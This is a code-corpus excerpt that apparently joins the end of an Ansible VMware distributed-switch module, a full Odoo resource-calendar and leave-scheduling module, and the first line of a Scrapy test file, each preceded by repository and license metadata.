len(self.dvs.config.uplinkPortPolicy.uplinkPortName) != self.uplink_quantity: changed = changed_settings = True changed_list.append("uplink quantity") results['uplink_quantity_previous'] = len(self.dvs.config.uplinkPortPolicy.uplinkPortName) config_spec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy() # just replace the uplink array if uplinks need to be added if len(self.dvs.config.uplinkPortPolicy.uplinkPortName) < self.uplink_quantity: for count in range(1, self.uplink_quantity + 1): config_spec.uplinkPortPolicy.uplinkPortName.append("%s%d" % (self.uplink_prefix, count)) # just replace the uplink array if uplinks need to be removed if len(self.dvs.config.uplinkPortPolicy.uplinkPortName) > self.uplink_quantity: for count in range(1, self.uplink_quantity + 1): config_spec.uplinkPortPolicy.uplinkPortName.append("%s%d" % (self.uplink_prefix, count)) results['uplinks'] = config_spec.uplinkPortPolicy.uplinkPortName results['uplinks_previous'] = self.dvs.config.uplinkPortPolicy.uplinkPortName else: # No uplink name check; uplink names can't be changed easily if they are used by a portgroup results['uplinks'] = self.dvs.config.uplinkPortPolicy.uplinkPortName # Check Health Check results['health_check_vlan'] = self.health_check_vlan results['health_check_teaming'] = self.health_check_teaming results['health_check_vlan_interval'] = self.health_check_vlan_interval results['health_check_teaming_interval'] = self.health_check_teaming_interval (health_check_config, changed_health_check, changed_vlan, vlan_previous, changed_vlan_interval, vlan_interval_previous, changed_teaming, teaming_previous, changed_teaming_interval, teaming_interval_previous) = \ self.check_health_check_config(self.dvs.config.healthCheckConfig) if changed_health_check: changed = True changed_list.append("health check") if changed_vlan: results['health_check_vlan_previous'] = vlan_previous if changed_vlan_interval: results['health_check_vlan_interval_previous'] = 
vlan_interval_previous if changed_teaming: results['health_check_teaming_previous'] = teaming_previous if changed_teaming_interval: results['health_check_teaming_interval_previous'] = teaming_interval_previous # Check switch version if self.switch_version: results['version'] = self.switch_version if self.dvs.config.productInfo.version != self.switch_version: changed_version = True spec_product = self.create_product_spec(self.switch_version) else: results['version'] = self.vcenter_switch_version if self.dvs.config.productInfo.version != self.vcenter_switch_version: changed_version = True spec_product = self.create_product_spec(self.vcenter_switch_version) if changed_version: changed = True changed_list.append("switch version") results['version_previous'] = self.dvs.config.productInfo.version if changed: if self.module.check_mode: changed_suffix = ' would be changed' else: changed_suffix = ' changed' if len(changed_list) > 2: message = ', '.join(changed_list[:-1]) + ', and ' + str(changed_list[-1]) elif len(changed_list) == 2: message = ' and '.join(changed_list) elif len(changed_list) == 1: message = changed_list[0] message += changed_suffix if not self.module.check_mode: if changed_settings: self.update_dvs_config(self.dvs, config_spec) if changed_health_check: self.update_health_check_config(self.dvs, health_check_config) if changed_version: task = self.dvs.PerformDvsProductSpecOperation_Task("upgrade", spec_product) try: wait_for_task(task) except TaskError as invalid_argument: self.module.fail_json(msg="Failed to update DVS version : %s" % to_native(invalid_argument)) else: message = "DVS already configured properly" results['changed'] = changed results['result'] = message self.module.exit_json(**results) def main(): """Main""" argument_spec = vmware_argument_spec() argument_spec.update( dict( datacenter_name=dict(aliases=['datacenter']), folder=dict(), switch_name=dict(required=True, aliases=['switch', 'dvswitch']), mtu=dict(type='int', default=1500), 
multicast_filtering_mode=dict(type='str', default='basic', choices=['basic', 'snooping']), switch_version=dict( choices=['5.0.0', '5.1.0', '5.5.0', '6.0.0', '6.5.0', '6.6.0'], aliases=['version'], default=None ), uplink_quantity=dict(type='int'), uplink_prefix=dict(type='str', default='Uplink '), discovery_proto=dict( type='str', choices=['cdp', 'lldp', 'disabled'], default='cdp', aliases=['discovery_protocol'] ), discovery_operation=dict(type='str', choices=['both', 'advertise', 'listen'], default='listen'), health_check=dict( type='dict', options=dict( vlan_mtu=dict(type='bool', default=False), teaming_failover=dict(type='bool', default=False), vlan_mtu_interval=dict(type='int', default=0), teaming_failover_interval=dict(type='int', default=0), ), default=dict( vlan_mtu=False, teaming_failover=False, vlan_mtu_interval=0, teaming_failover_interval=0, ), ), contact=dict( type='dict', options=dict( name=dict(type='str'), description=dict(type='str'), ), ), description=dict(type='str'), state=dict(default='present', choices=['present', 'absent']), ) ) module = AnsibleModule( argument_spec=argument_spec, required_if=[ ('state', 'present', ['uplink_quantity']), ], required_one_of=[ ['folder', 'datacenter_name'], ], mutually_exclusive=[ ['folder', 'datacenter_name'], ], supports_check_mode=True, ) vmware_dvswitch = VMwareDvSwitch(module) vmware_dvswitch.process_state() if __name__ == '__main__': main()
gpl-3.0
miguelparaiso/OdooAccessible
addons/resource/resource.py
174
42653
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-TODAY OpenERP SA (http://www.openerp.com) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import datetime from dateutil import rrule from dateutil.relativedelta import relativedelta from operator import itemgetter from openerp import tools from openerp.osv import fields, osv from openerp.tools.float_utils import float_compare from openerp.tools.translate import _ class resource_calendar(osv.osv): """ Calendar model for a resource. It has - attendance_ids: list of resource.calendar.attendance that are a working interval in a given weekday. - leave_ids: list of leaves linked to this calendar. A leave can be general or linked to a specific resource, depending on its resource_id. All methods in this class use intervals. An interval is a tuple holding (begin_datetime, end_datetime). A list of intervals is therefore a list of tuples, holding several intervals of work or leaves. 
""" _name = "resource.calendar" _description = "Resource Calendar" _columns = { 'name': fields.char("Name", required=True), 'company_id': fields.many2one('res.company', 'Company', required=False), 'attendance_ids': fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time', copy=True), 'manager': fields.many2one('res.users', 'Workgroup Manager'), 'leave_ids': fields.one2many( 'resource.calendar.leaves', 'calendar_id', 'Leaves', help='' ), } _defaults = { 'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context) } # -------------------------------------------------- # Utility methods # -------------------------------------------------- def interval_clean(self, intervals): """ Utility method that sorts and removes overlapping inside datetime intervals. The intervals are sorted based on increasing starting datetime. Overlapping intervals are merged into a single one. :param list intervals: list of intervals; each interval is a tuple (datetime_from, datetime_to) :return list cleaned: list of sorted intervals without overlap """ intervals = sorted(intervals, key=itemgetter(0)) # sort on first datetime cleaned = [] working_interval = None while intervals: current_interval = intervals.pop(0) if not working_interval: # init working_interval = [current_interval[0], current_interval[1]] elif working_interval[1] < current_interval[0]: # interval is disjoint cleaned.append(tuple(working_interval)) working_interval = [current_interval[0], current_interval[1]] elif working_interval[1] < current_interval[1]: # union of greater intervals working_interval[1] = current_interval[1] if working_interval: # handle void lists cleaned.append(tuple(working_interval)) return cleaned def interval_remove_leaves(self, interval, leave_intervals): """ Utility method that remove leave intervals from a base interval: - clean the leave intervals, to have an ordered list of not-overlapping 
intervals - initiate the current interval to be the base interval - for each leave interval: - finishing before the current interval: skip, go to next - beginning after the current interval: skip and get out of the loop because we are outside range (leaves are ordered) - beginning within the current interval: close the current interval and begin a new current interval that begins at the end of the leave interval - ending within the current interval: update the current interval begin to match the leave interval ending :param tuple interval: a tuple (beginning datetime, ending datetime) that is the base interval from which the leave intervals will be removed :param list leave_intervals: a list of tuples (beginning datetime, ending datetime) that are intervals to remove from the base interval :return list intervals: a list of tuples (begin datetime, end datetime) that are the remaining valid intervals """ if not interval: return interval if leave_intervals is None: leave_intervals = [] intervals = [] leave_intervals = self.interval_clean(leave_intervals) current_interval = [interval[0], interval[1]] for leave in leave_intervals: if leave[1] <= current_interval[0]: continue if leave[0] >= current_interval[1]: break if current_interval[0] < leave[0] < current_interval[1]: current_interval[1] = leave[0] intervals.append((current_interval[0], current_interval[1])) current_interval = [leave[1], interval[1]] # if current_interval[0] <= leave[1] <= current_interval[1]: if current_interval[0] <= leave[1]: current_interval[0] = leave[1] if current_interval and current_interval[0] < interval[1]: # remove intervals moved outside base interval due to leaves intervals.append((current_interval[0], current_interval[1])) return intervals def interval_schedule_hours(self, intervals, hour, remove_at_end=True): """ Schedule hours in intervals. The last matching interval is truncated to match the specified hours. It is possible to truncate the last interval at its beginning or ending. 
However this does nothing on the given interval order that should be submitted accordingly. :param list intervals: a list of tuples (beginning datetime, ending datetime) :param int/float hours: number of hours to schedule. It will be converted into a timedelta, but should be submitted as an int or float. :param boolean remove_at_end: remove extra hours at the end of the last matching interval. Otherwise, do it at the beginning. :return list results: a list of intervals. If the number of hours to schedule is greater than the possible scheduling in the intervals, no extra-scheduling is done, and results == intervals. """ results = [] res = datetime.timedelta() limit = datetime.timedelta(hours=hour) for interval in intervals: res += interval[1] - interval[0] if res > limit and remove_at_end: interval = (interval[0], interval[1] + relativedelta(seconds=seconds(limit-res))) elif res > limit: interval = (interval[0] + relativedelta(seconds=seconds(res-limit)), interval[1]) results.append(interval) if res > limit: break return results # -------------------------------------------------- # Date and hours computation # -------------------------------------------------- def get_attendances_for_weekdays(self, cr, uid, id, weekdays, context=None): """ Given a list of weekdays, return matching resource.calendar.attendance""" calendar = self.browse(cr, uid, id, context=None) return [att for att in calendar.attendance_ids if int(att.dayofweek) in weekdays] def get_weekdays(self, cr, uid, id, default_weekdays=None, context=None): """ Return the list of weekdays that contain at least one working interval. If no id is given (no calendar), return default weekdays. 
""" if id is None: return default_weekdays if default_weekdays is not None else [0, 1, 2, 3, 4] calendar = self.browse(cr, uid, id, context=None) weekdays = set() for attendance in calendar.attendance_ids: weekdays.add(int(attendance.dayofweek)) return list(weekdays) def get_next_day(self, cr, uid, id, day_date, context=None): """ Get following date of day_date, based on resource.calendar. If no calendar is provided, just return the next day. :param int id: id of a resource.calendar. If not given, simply add one day to the submitted date. :param date day_date: current day as a date :return date: next day of calendar, or just next day """ if not id: return day_date + relativedelta(days=1) weekdays = self.get_weekdays(cr, uid, id, context) base_index = -1 for weekday in weekdays: if weekday > day_date.weekday(): break base_index += 1 new_index = (base_index + 1) % len(weekdays) days = (weekdays[new_index] - day_date.weekday()) if days < 0: days = 7 + days return day_date + relativedelta(days=days) def get_previous_day(self, cr, uid, id, day_date, context=None): """ Get previous date of day_date, based on resource.calendar. If no calendar is provided, just return the previous day. :param int id: id of a resource.calendar. If not given, simply remove one day from the submitted date. :param date day_date: current day as a date :return date: previous day of calendar, or just previous day """ if not id: return day_date + relativedelta(days=-1) weekdays = self.get_weekdays(cr, uid, id, context) weekdays.reverse() base_index = -1 for weekday in weekdays: if weekday < day_date.weekday(): break base_index += 1 new_index = (base_index + 1) % len(weekdays) days = (weekdays[new_index] - day_date.weekday()) if days > 0: days = days - 7 return day_date + relativedelta(days=days) def get_leave_intervals(self, cr, uid, id, resource_id=None, start_datetime=None, end_datetime=None, context=None): """Get the leaves of the calendar. 
Leaves can be filtered on the resource, the start datetime or the end datetime. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param datetime start_datetime: if provided, do not take into account leaves ending before this date. :param datetime end_datetime: if provided, do not take into account leaves beginning after this date. :return list leaves: list of tuples (start_datetime, end_datetime) of leave intervals """ resource_calendar = self.browse(cr, uid, id, context=context) leaves = [] for leave in resource_calendar.leave_ids: if leave.resource_id and not resource_id == leave.resource_id.id: continue date_from = datetime.datetime.strptime(leave.date_from, tools.DEFAULT_SERVER_DATETIME_FORMAT) if end_datetime and date_from > end_datetime: continue date_to = datetime.datetime.strptime(leave.date_to, tools.DEFAULT_SERVER_DATETIME_FORMAT) if start_datetime and date_to < start_datetime: continue leaves.append((date_from, date_to)) return leaves def get_working_intervals_of_day(self, cr, uid, id, start_dt=None, end_dt=None, leaves=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Get the working intervals of the day based on calendar. This method handle leaves that come directly from the leaves parameter or can be computed. :param int id: resource.calendar id; take the first one if is a list :param datetime start_dt: datetime object that is the beginning hours for the working intervals computation; any working interval beginning before start_dt will be truncated. If not set, set to end_dt or today() if no end_dt at 00.00.00. :param datetime end_dt: datetime object that is the ending hour for the working intervals computation; any working interval ending after end_dt will be truncated. If not set, set to start_dt() at 23.59.59. 
:param list leaves: a list of tuples(start_datetime, end_datetime) that represent leaves. :param boolean compute_leaves: if set and if leaves is None, compute the leaves based on calendar and resource. If leaves is None and compute_leaves false no leaves are taken into account. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param tuple default_interval: if no id, try to return a default working day using default_interval[0] as beginning hour, and default_interval[1] as ending hour. Example: default_interval = (8, 16). Otherwise, a void list of working intervals is returned when id is None. :return list intervals: a list of tuples (start_datetime, end_datetime) of work intervals """ if isinstance(id, (list, tuple)): id = id[0] # Computes start_dt, end_dt (with default values if not set) + off-interval work limits work_limits = [] if start_dt is None and end_dt is not None: start_dt = end_dt.replace(hour=0, minute=0, second=0) elif start_dt is None: start_dt = datetime.datetime.now().replace(hour=0, minute=0, second=0) else: work_limits.append((start_dt.replace(hour=0, minute=0, second=0), start_dt)) if end_dt is None: end_dt = start_dt.replace(hour=23, minute=59, second=59) else: work_limits.append((end_dt, end_dt.replace(hour=23, minute=59, second=59))) assert start_dt.date() == end_dt.date(), 'get_working_intervals_of_day is restricted to one day' intervals = [] work_dt = start_dt.replace(hour=0, minute=0, second=0) # no calendar: try to use the default_interval, then return directly if id is None: if default_interval: working_interval = (start_dt.replace(hour=default_interval[0], minute=0, second=0), start_dt.replace(hour=default_interval[1], minute=0, second=0)) intervals = self.interval_remove_leaves(working_interval, work_limits) return intervals working_intervals = [] for calendar_working_day in 
self.get_attendances_for_weekdays(cr, uid, id, [start_dt.weekday()], context): working_interval = ( work_dt.replace(hour=int(calendar_working_day.hour_from)), work_dt.replace(hour=int(calendar_working_day.hour_to)) ) working_intervals += self.interval_remove_leaves(working_interval, work_limits) # find leave intervals if leaves is None and compute_leaves: leaves = self.get_leave_intervals(cr, uid, id, resource_id=resource_id, context=None) # filter according to leaves for interval in working_intervals: work_intervals = self.interval_remove_leaves(interval, leaves) intervals += work_intervals return intervals def get_working_hours_of_date(self, cr, uid, id, start_dt=None, end_dt=None, leaves=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Get the working hours of the day based on calendar. This method uses get_working_intervals_of_day to have the work intervals of the day. It then calculates the number of hours contained in those intervals. """ res = datetime.timedelta() intervals = self.get_working_intervals_of_day( cr, uid, id, start_dt, end_dt, leaves, compute_leaves, resource_id, default_interval, context) for interval in intervals: res += interval[1] - interval[0] return seconds(res) / 3600.0 def get_working_hours(self, cr, uid, id, start_dt, end_dt, compute_leaves=False, resource_id=None, default_interval=None, context=None): hours = 0.0 for day in rrule.rrule(rrule.DAILY, dtstart=start_dt, until=(end_dt + datetime.timedelta(days=1)).replace(hour=0, minute=0, second=0), byweekday=self.get_weekdays(cr, uid, id, context=context)): day_start_dt = day.replace(hour=0, minute=0, second=0) if start_dt and day.date() == start_dt.date(): day_start_dt = start_dt day_end_dt = day.replace(hour=23, minute=59, second=59) if end_dt and day.date() == end_dt.date(): day_end_dt = end_dt hours += self.get_working_hours_of_date( cr, uid, id, start_dt=day_start_dt, end_dt=day_end_dt, compute_leaves=compute_leaves, resource_id=resource_id, 
default_interval=default_interval, context=context) return hours # -------------------------------------------------- # Hours scheduling # -------------------------------------------------- def _schedule_hours(self, cr, uid, id, hours, day_dt=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Schedule hours of work, using a calendar and an optional resource to compute working and leave days. This method can be used backwards, i.e. scheduling days before a deadline. :param int hours: number of hours to schedule. Use a negative number to compute a backwards scheduling. :param datetime day_dt: reference date to compute working days. If days is > 0 date is the starting date. If days is < 0 date is the ending date. :param boolean compute_leaves: if set, compute the leaves based on calendar and resource. Otherwise no leaves are taken into account. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param tuple default_interval: if no id, try to return a default working day using default_interval[0] as beginning hour, and default_interval[1] as ending hour. Example: default_interval = (8, 16). Otherwise, a void list of working intervals is returned when id is None. :return tuple (datetime, intervals): datetime is the beginning/ending date of the schedulign; intervals are the working intervals of the scheduling. Note: Why not using rrule.rrule ? Because rrule does not seem to allow getting back in time. 
""" if day_dt is None: day_dt = datetime.datetime.now() backwards = (hours < 0) hours = abs(hours) intervals = [] remaining_hours = hours * 1.0 iterations = 0 current_datetime = day_dt call_args = dict(compute_leaves=compute_leaves, resource_id=resource_id, default_interval=default_interval, context=context) while float_compare(remaining_hours, 0.0, precision_digits=2) in (1, 0) and iterations < 1000: if backwards: call_args['end_dt'] = current_datetime else: call_args['start_dt'] = current_datetime working_intervals = self.get_working_intervals_of_day(cr, uid, id, **call_args) if id is None and not working_intervals: # no calendar -> consider working 8 hours remaining_hours -= 8.0 elif working_intervals: if backwards: working_intervals.reverse() new_working_intervals = self.interval_schedule_hours(working_intervals, remaining_hours, not backwards) if backwards: new_working_intervals.reverse() res = datetime.timedelta() for interval in working_intervals: res += interval[1] - interval[0] remaining_hours -= (seconds(res) / 3600.0) if backwards: intervals = new_working_intervals + intervals else: intervals = intervals + new_working_intervals # get next day if backwards: current_datetime = datetime.datetime.combine(self.get_previous_day(cr, uid, id, current_datetime, context), datetime.time(23, 59, 59)) else: current_datetime = datetime.datetime.combine(self.get_next_day(cr, uid, id, current_datetime, context), datetime.time()) # avoid infinite loops iterations += 1 return intervals def schedule_hours_get_date(self, cr, uid, id, hours, day_dt=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_hours: return the beginning/ending datetime of an hours scheduling. 
""" res = self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context) return res and res[0][0] or False def schedule_hours(self, cr, uid, id, hours, day_dt=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_hours: return the working intervals of an hours scheduling. """ return self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context) # -------------------------------------------------- # Days scheduling # -------------------------------------------------- def _schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """Schedule days of work, using a calendar and an optional resource to compute working and leave days. This method can be used backwards, i.e. scheduling days before a deadline. :param int days: number of days to schedule. Use a negative number to compute a backwards scheduling. :param date day_date: reference date to compute working days. If days is > 0 date is the starting date. If days is < 0 date is the ending date. :param boolean compute_leaves: if set, compute the leaves based on calendar and resource. Otherwise no leaves are taken into account. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param tuple default_interval: if no id, try to return a default working day using default_interval[0] as beginning hour, and default_interval[1] as ending hour. Example: default_interval = (8, 16). Otherwise, a void list of working intervals is returned when id is None. :return tuple (datetime, intervals): datetime is the beginning/ending date of the schedulign; intervals are the working intervals of the scheduling. 
Implementation note: rrule.rrule is not used because rrule it des not seem to allow getting back in time. """ if day_date is None: day_date = datetime.datetime.now() backwards = (days < 0) days = abs(days) intervals = [] planned_days = 0 iterations = 0 if backwards: current_datetime = day_date.replace(hour=23, minute=59, second=59) else: current_datetime = day_date.replace(hour=0, minute=0, second=0) while planned_days < days and iterations < 1000: working_intervals = self.get_working_intervals_of_day( cr, uid, id, current_datetime, compute_leaves=compute_leaves, resource_id=resource_id, default_interval=default_interval, context=context) if id is None or working_intervals: # no calendar -> no working hours, but day is considered as worked planned_days += 1 intervals += working_intervals # get next day if backwards: current_datetime = self.get_previous_day(cr, uid, id, current_datetime, context) else: current_datetime = self.get_next_day(cr, uid, id, current_datetime, context) # avoid infinite loops iterations += 1 return intervals def schedule_days_get_date(self, cr, uid, id, days, day_date=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_days: return the beginning/ending datetime of a days scheduling. """ res = self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context) return res and res[-1][1] or False def schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_days: return the working intervals of a days scheduling. 
""" return self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context) # -------------------------------------------------- # Compatibility / to clean / to remove # -------------------------------------------------- def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None): """ Used in hr_payroll/hr_payroll.py :deprecated: OpenERP saas-3. Use get_working_hours_of_date instead. Note: since saas-3, take hour/minutes into account, not just the whole day.""" if isinstance(day, datetime.datetime): day = day.replace(hour=0, minute=0) return self.get_working_hours_of_date(cr, uid, resource_calendar_id.id, start_dt=day, context=None) def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False): """ Schedule hours backwards. Used in mrp_operations/mrp_operations.py. :deprecated: OpenERP saas-3. Use schedule_hours instead. Note: since saas-3, counts leave hours instead of all-day leaves.""" return self.schedule_hours( cr, uid, id, hours * -1.0, day_dt=dt_from.replace(minute=0, second=0), compute_leaves=True, resource_id=resource, default_interval=(8, 16) ) def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True): """ Used in mrp_operations/mrp_operations.py (default parameters) and in interval_get() :deprecated: OpenERP saas-3. Use schedule_hours instead. Note: Byday was not used. Since saas-3, counts Leave hours instead of all-day leaves.""" res = {} for dt_str, hours, calendar_id in date_and_hours_by_cal: result = self.schedule_hours( cr, uid, calendar_id, hours, day_dt=datetime.datetime.strptime(dt_str, '%Y-%m-%d %H:%M:%S').replace(minute=0, second=0), compute_leaves=True, resource_id=resource, default_interval=(8, 16) ) res[(dt_str, hours, calendar_id)] = result return res def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True): """ Unifier of interval_get_multi. Used in: mrp_operations/mrp_operations.py, crm/crm_lead.py (res given). 
:deprecated: OpenERP saas-3. Use get_working_hours instead.""" res = self.interval_get_multi( cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)] return res def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False): """ Unused wrapper. :deprecated: OpenERP saas-3. Use get_working_hours instead.""" return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource) def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None): """ Computes working hours between two dates, taking always same hour/minuts. :deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3, now resets hour/minuts. Now counts leave hours instead of all-day leaves.""" return self.get_working_hours( cr, uid, id, dt_from, dt_to, compute_leaves=(not exclude_leaves), resource_id=resource_id, default_interval=(8, 16), context=context) class resource_calendar_attendance(osv.osv): _name = "resource.calendar.attendance" _description = "Work Detail" _columns = { 'name' : fields.char("Name", required=True), 'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True), 'date_from' : fields.date('Starting Date'), 'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True), 'hour_to' : fields.float("Work to", required=True), 'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True), } _order = 'dayofweek, hour_from' _defaults = { 'dayofweek' : '0' } def hours_time_string(hours): """ convert a number of hours (float) into a string with format '%H:%M' """ minutes = int(round(hours * 60)) return "%02d:%02d" % divmod(minutes, 60) class resource_resource(osv.osv): _name = "resource.resource" _description = 
"Resource Detail" _columns = { 'name': fields.char("Name", required=True), 'code': fields.char('Code', size=16, copy=False), 'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."), 'company_id' : fields.many2one('res.company', 'Company'), 'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True), 'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'), 'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depict the efficiency of the resource to complete tasks. e.g resource put alone on a phase of 5 days with 5 tasks assigned to him, will show a load of 100% for this phase by default, but if we put a efficiency of 200%, then his load will only be 50%."), 'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the schedule of resource"), } _defaults = { 'resource_type' : 'user', 'time_efficiency' : 1, 'active' : True, 'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context) } def copy(self, cr, uid, id, default=None, context=None): if default is None: default = {} if not default.get('name', False): default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name)) return super(resource_resource, self).copy(cr, uid, id, default, context) def generate_resources(self, cr, uid, user_ids, calendar_id, context=None): """ Return a list of Resource Class objects for the resources allocated to the phase. 
NOTE: Used in project/project.py """ resource_objs = {} user_pool = self.pool.get('res.users') for user in user_pool.browse(cr, uid, user_ids, context=context): resource_objs[user.id] = { 'name' : user.name, 'vacation': [], 'efficiency': 1.0, } resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context) if resource_ids: for resource in self.browse(cr, uid, resource_ids, context=context): resource_objs[user.id]['efficiency'] = resource.time_efficiency resource_cal = resource.calendar_id.id if resource_cal: leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context) resource_objs[user.id]['vacation'] += list(leaves) return resource_objs def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None): """ Compute the vacation from the working calendar of the resource. @param calendar_id : working calendar of the project @param resource_id : resource working on phase/task @param resource_calendar : working calendar of the resource NOTE: used in project/project.py, and in generate_resources """ resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves') leave_list = [] if resource_id: leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id), ('calendar_id', '=', resource_calendar), ('resource_id', '=', resource_id) ], context=context) else: leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id), ('resource_id', '=', False) ], context=context) leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context) for i in range(len(leaves)): dt_start = datetime.datetime.strptime(leaves[i]['date_from'], '%Y-%m-%d %H:%M:%S') dt_end = datetime.datetime.strptime(leaves[i]['date_to'], '%Y-%m-%d %H:%M:%S') no = dt_end - dt_start [leave_list.append((dt_start + datetime.timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))] 
leave_list.sort() return leave_list def compute_working_calendar(self, cr, uid, calendar_id=False, context=None): """ Change the format of working calendar from 'Openerp' format to bring it into 'Faces' format. @param calendar_id : working calendar of the project NOTE: used in project/project.py """ if not calendar_id: # Calendar is not specified: working days: 24/7 return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'), ('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')] resource_attendance_pool = self.pool.get('resource.calendar.attendance') time_range = "8:00-8:00" non_working = "" week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"} wk_days = {} wk_time = {} wktime_list = [] wktime_cal = [] week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context) weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context) # Convert time formats into appropriate format required # and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')] for week in weeks: res_str = "" day = None if week_days.get(week['dayofweek'],False): day = week_days[week['dayofweek']] wk_days[week['dayofweek']] = week_days[week['dayofweek']] else: raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!')) hour_from_str = hours_time_string(week['hour_from']) hour_to_str = hours_time_string(week['hour_to']) res_str = hour_from_str + '-' + hour_to_str wktime_list.append((day, res_str)) # Convert into format like [('mon', '8:00-12:00', '13:00-18:00')] for item in wktime_list: if wk_time.has_key(item[0]): wk_time[item[0]].append(item[1]) else: wk_time[item[0]] = [item[0]] wk_time[item[0]].append(item[1]) for k,v in wk_time.items(): wktime_cal.append(tuple(v)) # Add for the non-working days like: [('sat, sun', '8:00-8:00')] for k, v 
in wk_days.items(): if week_days.has_key(k): week_days.pop(k) for v in week_days.itervalues(): non_working += v + ',' if non_working: wktime_cal.append((non_working[:-1], time_range)) return wktime_cal class resource_calendar_leaves(osv.osv): _name = "resource.calendar.leaves" _description = "Leave Detail" _columns = { 'name' : fields.char("Name"), 'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True), 'calendar_id' : fields.many2one("resource.calendar", "Working Time"), 'date_from' : fields.datetime('Start Date', required=True), 'date_to' : fields.datetime('End Date', required=True), 'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"), } def check_dates(self, cr, uid, ids, context=None): for leave in self.browse(cr, uid, ids, context=context): if leave.date_from and leave.date_to and leave.date_from > leave.date_to: return False return True _constraints = [ (check_dates, 'Error! leave start-date must be lower then leave end-date.', ['date_from', 'date_to']) ] def onchange_resource(self, cr, uid, ids, resource, context=None): result = {} if resource: resource_pool = self.pool.get('resource.resource') result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id return {'value': result} return {'value': {'calendar_id': []}} def seconds(td): assert isinstance(td, datetime.timedelta) return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10.**6 # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
1900/scrapy
scrapy/tests/test_spidermiddleware_httperror.py
27
1658
from unittest import TestCase

